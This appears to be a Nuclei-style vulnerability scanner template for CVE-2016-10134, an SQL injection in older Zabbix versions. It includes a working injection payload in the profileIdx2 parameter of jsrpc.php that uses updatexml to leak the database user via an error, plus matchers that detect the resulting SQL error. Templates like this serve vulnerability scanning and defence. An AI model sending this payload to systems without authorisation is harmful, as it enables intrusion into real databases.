39 lines
1.2 KiB
YAML
39 lines
1.2 KiB
YAML
id: CVE-2016-10134
|
|
|
|
info:
|
|
name: Zabbix - SQL Injection
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
|
|
- https://support.zabbix.com/browse/ZBX-11023
|
|
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-10134
|
|
cwe-id: CWE-89
|
|
tags: cve,cve2016,zabbix,sqli
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Error in query [INSERT INTO profiles (profileid, userid'
|
|
- 'You have an error in your SQL syntax'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/05/10
|